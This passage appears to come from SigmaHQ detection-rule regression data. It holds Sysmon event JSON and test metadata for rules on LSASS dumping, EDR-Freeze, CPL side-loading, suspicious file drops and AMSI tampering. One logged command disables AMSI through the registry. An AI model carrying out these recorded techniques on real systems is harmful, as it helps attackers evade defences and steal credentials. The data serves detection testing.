    "path": "regression_data/rules/windows/file/file_event/file_event_win_dump_file_susp_creation/info.yml",
    "content": "id: 5640730a-30d1-4aca-9ad3-dbb9000bb091\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: aba15bdd-657f-422a-bab3-ac2d2a0d6f1c\n      title: Potentially Suspicious DMP/HDMP File Creation\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/file/file_event/file_event_win_dump_file_susp_creation/aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_in_uncommon_location/1cf465a1-2609-4c15-9b66-c32dbe4bfd67.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-10T05:14:28.844323Z\"\n        }\n      },\n      \"EventRecordID\": 18792,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"Public\",\n      \"UtcTime\": \"2025-12-10 05:14:28.840\",\n      \"ProcessGuid\": \"0197231E-01A8-6939-0811-000000000800\",\n      \"ProcessId\": 8868,\n      \"Image\": \"C:\\\\WINDOWS\\\\system32\\\\certutil.exe\",\n      \"TargetFilename\": \"C:\\\\Users\\\\Public\\\\7zip.exe\",\n      \"CreationUtcTime\": \"2025-12-10 05:14:28.840\",\n      \"User\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_in_uncommon_location/info.yml",
    "content": "id: 27565138-af8e-4c92-956e-586bbc0a3539\ndescription: N/A\ndate: 2025-12-10\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 1cf465a1-2609-4c15-9b66-c32dbe4bfd67\n      title: Legitimate Application Writing Files In Uncommon Location\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_in_uncommon_location/1cf465a1-2609-4c15-9b66-c32dbe4bfd67.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension/3215aa19-f060-4332-86d5-5602511f3ca8.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:54:01.546728Z\"\n        }\n      },\n      \"EventRecordID\": 86290,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:54:01.546\",\n      \"ProcessGuid\": \"5AA13A44-0C90-68FC-BF1D-000000004002\",\n      \"ProcessId\": 10048,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\cmd.exe\",\n      \"TargetFilename\": \"C:\\\\evil.doc.lnk\",\n      \"CreationUtcTime\": \"2025-10-24 23:54:01.546\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension/info.yml",
    "content": "id: fbe93ba9-3124-4488-b6d8-ca3f7bb34c4b\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 3215aa19-f060-4332-86d5-5602511f3ca8\n      title: Suspicious LNK Double Extension File Created\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension/3215aa19-f060-4332-86d5-5602511f3ca8.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:52:38.278829Z\"\n        }\n      },\n      \"EventRecordID\": 74174,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:52:38.276\",\n      \"ProcessGuid\": \"5AA13A44-0C90-68FC-BF1D-000000004002\",\n      \"ProcessId\": 10048,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\cmd.exe\",\n      \"TargetFilename\": \"C:\\\\Users\\\\Public\\\\persistence.bat\",\n      \"CreationUtcTime\": \"2025-10-24 23:52:38.276\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_susp_public_folder_extension/info.yml",
    "content": "id: 9556b96b-462a-4238-a0bf-5e11ff0408fe\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e\n      title: Suspicious Binaries and Scripts in Public Folder\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:51:54.709878Z\"\n        }\n      },\n      \"EventRecordID\": 67705,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:51:54.705\",\n      \"ProcessGuid\": \"5AA13A44-0C90-68FC-BF1D-000000004002\",\n      \"ProcessId\": 10048,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\cmd.exe\",\n      \"TargetFilename\": \"C:\\\\RECYCLERS.BIN\\\\malware.exe\",\n      \"CreationUtcTime\": \"2025-10-24 23:51:54.705\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/info.yml",
    "content": "id: 6d485a4e-83d1-4ead-8173-9fddddb3ba22\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca\n      title: Suspicious File Creation Activity From Fake Recycle.Bin Folder\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_taskmgr_lsass_dump/69ca12af-119d-44ed-b50f-a47af0ebc364.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:50:20.590884Z\"\n        }\n      },\n      \"EventRecordID\": 53968,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:50:20.576\",\n      \"ProcessGuid\": \"5AA13A44-10B3-68FC-4E1E-000000004002\",\n      \"ProcessId\": 2956,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\taskmgr.exe\",\n      \"TargetFilename\": \"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\lsass.DMP\",\n      \"CreationUtcTime\": \"2025-10-24 23:50:20.576\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_taskmgr_lsass_dump/info.yml",
    "content": "id: 55db307d-4a36-4594-bea8-7d114714d3b4\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 69ca12af-119d-44ed-b50f-a47af0ebc364\n      title: LSASS Process Memory Dump Creation Via Taskmgr.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/file/file_event/file_event_win_taskmgr_lsass_dump/69ca12af-119d-44ed-b50f-a47af0ebc364.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/image_load/image_load_side_load_cpl_from_non_system_location/2b140a5c-dc02-4bb8-b6b1-8bdb45714cde.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 7,\n      \"Version\": 3,\n      \"Level\": 4,\n      \"Task\": 7,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2026-02-04T08:43:28.342637Z\"\n        }\n      },\n      \"EventRecordID\": 715282,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 776,\n          \"ThreadID\": 4352\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"srv-01.midgardnet.tech\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2026-02-04 08:43:28.234\",\n      \"ProcessGuid\": \"14207D89-06B0-6983-CF01-000000004402\",\n      \"ProcessId\": 6672,\n      \"Image\": \"C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\fsquirt.exe\",\n      \"ImageLoaded\": \"C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\bthprops.cpl\",\n      \"FileVersion\": \"-\",\n      \"Description\": \"-\",\n      \"Product\": \"-\",\n      \"Company\": \"-\",\n      \"OriginalFileName\": \"-\",\n      \"Hashes\": \"MD5=221877743CF329314E571E9398EFCA70,SHA256=863390BB749E466975A6A5330CCD077C846E1F387AAE0327AFFE33DF87153E67,IMPHASH=7FF91A855D5B3D338EB5B4CE63698F4A\",\n      \"Signed\": \"false\",\n      \"Signature\": \"-\",\n      \"SignatureStatus\": \"Unavailable\",\n      \"User\": \"MIDGARDNET\\\\SwachchhandaP\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/image_load/image_load_side_load_cpl_from_non_system_location/info.yml",
    "content": "id: 8ee57597-baba-46bd-8a61-85ff51f7aab6\ndescription: N/A\ndate: 2026-02-04\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 2b140a5c-dc02-4bb8-b6b1-8bdb45714cde\n      title: System Control Panel Item Loaded From Uncommon Location\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/image_load/image_load_side_load_cpl_from_non_system_location/2b140a5c-dc02-4bb8-b6b1-8bdb45714cde.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/image_load/image_load_win_susp_dbgcore_dbghelp_load/416bc4a2-7217-4519-8dc7-c3271817f1d5.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 7,\n      \"Version\": 3,\n      \"Level\": 4,\n      \"Task\": 7,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-11-27T07:57:32.309580Z\"\n        }\n      },\n      \"EventRecordID\": 676402,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3544,\n          \"ThreadID\": 4264\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-11-27 07:57:32.308\",\n      \"ProcessGuid\": \"0197231E-046C-6928-160C-000000000D00\",\n      \"ProcessId\": 296,\n      \"Image\": \"C:\\\\Users\\\\Public\\\\wsass\\\\WerFaultSecure.exe\",\n      \"ImageLoaded\": \"C:\\\\Windows\\\\System32\\\\dbgcore.dll\",\n      \"FileVersion\": \"10.0.26100.7019 (WinBuild.160101.0800)\",\n      \"Description\": \"Windows Core Debugging Helpers\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"DBGCORE.DLL\",\n      \"Hashes\": \"SHA1=5E4F2C531C549BB72A658ED9DD16D491EDDBB286,MD5=FAB4B30C1C4F0A9202A7B42DCF1729DC,SHA256=1B48A4F8D20026E6C56E3AB4CC4788FA6425C8A75F8D91C2869FA533DE6B209E,IMPHASH=C324AAAC01F0F75C811E1F80C41B860C\",\n      \"Signed\": \"true\",\n      \"Signature\": \"Microsoft Windows\",\n      \"SignatureStatus\": \"Valid\",\n      \"User\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/image_load/image_load_win_susp_dbgcore_dbghelp_load/info.yml",
    "content": "id: bc1c627e-6529-459d-9bd6-74ffb88b3320\ndescription: N/A\ndate: 2025-11-27\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 416bc4a2-7217-4519-8dc7-c3271817f1d5\n      title: Suspicious Loading of Dbgcore/Dbghelp DLLs from Uncommon Location\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/image_load/image_load_win_susp_dbgcore_dbghelp_load/416bc4a2-7217-4519-8dc7-c3271817f1d5.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_access/proc_access_win_susp_dbgcore_dbghelp_load/9f5c1d59-33be-4e60-bcab-85d2f566effd.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 10,\n      \"Version\": 3,\n      \"Level\": 4,\n      \"Task\": 10,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-11-27T07:57:32.317336Z\"\n        }\n      },\n      \"EventRecordID\": 676404,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3544,\n          \"ThreadID\": 4264\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-11-27 07:57:32.315\",\n      \"SourceProcessGUID\": \"0197231E-046C-6928-160C-000000000D00\",\n      \"SourceProcessId\": 296,\n      \"SourceThreadId\": 5260,\n      \"SourceImage\": \"C:\\\\Users\\\\Public\\\\wsass\\\\WerFaultSecure.exe\",\n      \"TargetProcessGUID\": \"0197231E-2DD5-691E-0C00-000000000D00\",\n      \"TargetProcessId\": 860,\n      \"TargetImage\": \"C:\\\\WINDOWS\\\\system32\\\\lsass.exe\",\n      \"GrantedAccess\": \"0x1fffff\",\n      \"CallTrace\": \"C:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll+16bcc4|C:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll+17aee0|C:\\\\WINDOWS\\\\SYSTEM32\\\\KERNEL32.DLL+7f7dc|C:\\\\WINDOWS\\\\SYSTEM32\\\\KERNEL32.DLL+c8d28|C:\\\\WINDOWS\\\\SYSTEM32\\\\dbgcore.DLL+44c34|C:\\\\WINDOWS\\\\SYSTEM32\\\\dbgcore.DLL+48f2c|C:\\\\WINDOWS\\\\SYSTEM32\\\\dbgcore.DLL+3d414|C:\\\\WINDOWS\\\\SYSTEM32\\\\dbgcore.DLL+29c7c|C:\\\\WINDOWS\\\\SYSTEM32\\\\dbgcore.DLL+2a1f0|C:\\\\WINDOWS\\\\SYSTEM32\\\\dbgcore.DLL+4f894|C:\\\\Users\\\\Public\\\\wsass\\\\WerFaultSecure.exe+3a64|C:\\\\Users\\\\Public\\\\wsass\\\\WerFaultSecure.exe+2576|C:\\\\Users\\\\Public\\\\wsass\\\\WerFaultSecure.exe+20c9|C:\\\\Users\\\\Public\\\\wsass\\\\WerFaultSecure.exe+1a0b|C:\\\\Users\\\\Public\\\\wsass\\\\WerFaultSecure.exe+48cc|C:\\\\WINDOWS\\\\SYSTEM32\\\\KERNEL32.DLL+f17ac\",\n      \"SourceUser\": \"swachchhanda\\\\xodih\",\n      \"TargetUser\": \"NT AUTHORITY\\\\SYSTEM\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_access/proc_access_win_susp_dbgcore_dbghelp_load/info.yml",
    "content": "id: f0a580dc-386c-4049-8ca4-cef9f956dc4c\ndescription: N/A\ndate: 2025-11-27\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 9f5c1d59-33be-4e60-bcab-85d2f566effd\n      title: Suspicious Process Access to LSASS with Dbgcore/Dbghelp DLLs\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_access/proc_access_win_susp_dbgcore_dbghelp_load/9f5c1d59-33be-4e60-bcab-85d2f566effd.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_access/proc_access_win_werfaultsecure_msmpeng_access/387df17d-3b04-448f-8669-9e7fd5e5fd8c.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 10,\n      \"Version\": 3,\n      \"Level\": 4,\n      \"Task\": 10,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-11-27T07:22:22.033828Z\"\n        }\n      },\n      \"EventRecordID\": 445923,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3544,\n          \"ThreadID\": 4264\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-11-27 07:22:22.031\",\n      \"SourceProcessGUID\": \"0197231E-FC2D-6927-810B-000000000D00\",\n      \"SourceProcessId\": 7224,\n      \"SourceThreadId\": 4144,\n      \"SourceImage\": \"C:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n      \"TargetProcessGUID\": \"0197231E-2DD8-691E-4D00-000000000D00\",\n      \"TargetProcessId\": 3472,\n      \"TargetImage\": \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\4.18.25100.9008-0\\\\MsMpEng.exe\",\n      \"GrantedAccess\": \"0x1fffff\",\n      \"CallTrace\": \"C:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll+1284|C:\\\\WINDOWS\\\\SYSTEM32\\\\KERNEL32.DLL+185c4|C:\\\\WINDOWS\\\\SYSTEM32\\\\KERNEL32.DLL+4fe50|C:\\\\Windows\\\\System32\\\\dbgcore.DLL+164cc|C:\\\\Windows\\\\System32\\\\dbgcore.DLL+23e6c|C:\\\\Windows\\\\System32\\\\dbgcore.DLL+1b230|C:\\\\Windows\\\\System32\\\\dbgcore.DLL+112b4|C:\\\\Windows\\\\System32\\\\dbgcore.DLL+117a8|C:\\\\Windows\\\\System32\\\\WerFaultSecure.exe+115a4|C:\\\\Windows\\\\System32\\\\WerFaultSecure.exe+6a9c|C:\\\\Windows\\\\System32\\\\WerFaultSecure.exe+7378|C:\\\\Windows\\\\System32\\\\WerFaultSecure.exe+834c|C:\\\\Windows\\\\System32\\\\WerFaultSecure.exe+2748|C:\\\\Windows\\\\System32\\\\WerFaultSecure.exe+27e4|C:\\\\WINDOWS\\\\SYSTEM32\\\\KERNEL32.DLL+8740|C:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll+d4464\",\n      \"SourceUser\": \"swachchhanda\\\\xodih\",\n      \"TargetUser\": \"NT AUTHORITY\\\\SYSTEM\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_access/proc_access_win_werfaultsecure_msmpeng_access/info.yml",
    "content": "id: bd66a891-01c3-40b6-aafd-5c1676b44cf3\ndescription: N/A\ndate: 2025-11-27\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 387df17d-3b04-448f-8669-9e7fd5e5fd8c\n      title: Suspicious Process Access of MsMpEng by WerFaultSecure - EDR-Freeze\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_access/proc_access_win_werfaultsecure_msmpeng_access/387df17d-3b04-448f-8669-9e7fd5e5fd8c.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_amsi_registry_tampering/7dbbcac2-57a0-45ac-b306-ff30a8bd2981.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-25T14:30:27.369114Z\"\n        }\n      },\n      \"EventRecordID\": 16094,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-25 14:30:27.352\",\n      \"ProcessGuid\": \"0197231E-4A83-694D-9E0E-000000000800\",\n      \"ProcessId\": 14144,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\reg.exe\",\n      \"FileVersion\": \"10.0.26100.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Registry Console Tool\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"reg.exe\",\n      \"CommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\reg.exe\\\" add \\\"HKCU\\\\Software\\\\Microsoft\\\\Windows Script\\\\Settings\\\" /v AmsiEnable /t REG_DWORD /d 0 /f\",\n      \"CurrentDirectory\": \"C:\\\\WINDOWS\\\\system32\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-AB9F-67AA-4C14-030000000000\",\n      \"LogonId\": \"0x3144c\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"MD5=573EB13AC2BA31E9C2E17FB6DAD14154,SHA256=E295E776FD4F7F73DFAAA5698A19EA7A2F4A2F0C5E1681FAC94E45D00296C926,IMPHASH=A26BCB048DF34CBB422F2656F38634D0\",\n      \"ParentProcessGuid\": \"0197231E-EC48-694C-AA0C-000000000800\",\n      \"ParentProcessId\": 12456,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\n      \"ParentCommandLine\": 